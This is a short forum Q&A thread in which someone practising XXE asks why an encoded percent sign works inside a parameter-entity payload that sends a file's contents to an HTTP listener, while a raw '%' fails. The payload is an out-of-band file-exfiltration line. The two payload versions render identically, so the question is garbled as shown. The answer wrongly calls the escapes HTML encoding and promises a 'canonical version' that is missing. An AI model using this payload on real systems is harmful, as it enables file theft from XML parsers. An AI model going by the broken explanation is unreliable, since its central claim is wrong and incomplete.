Reputation: 63
When I was practice XXE, I found it worked when I use DTD ENTITY below to send my request.
<!ENTITY % print "<!ENTITY % send SYSTEM 'http://localhost:9090/landing?text=%file;'>">
But it didn't work when I send this.
<!ENTITY % print "<!ENTITY % send SYSTEM 'http://localhost:9090/landing?text=%file;'>">
The difference between them is "%" and "%",I wonder why it didn't work when I use "%" directly here. Thank you.
Upvotes: 0
Views: 343
Reputation: 76859
This is an HTML encoded percent %
sign (an escape sequence) within the PARAMETER ENTITY declaration of an XML file - and XML uses HTML encoding, in order not to break the syntax.
Quite the same in Android XML, which it also knows %%
...
there the raw %
is commonly being used for substitutions.
The canonical version would be:
Because XML syntax uses some characters for tags and attributes it is not possible to directly use those characters inside XML tags or attribute values.
And that's why some special characters in XML behave alike a "reserved keyword".
Also see 15.3. Understanding XML DTDs.
Upvotes: 2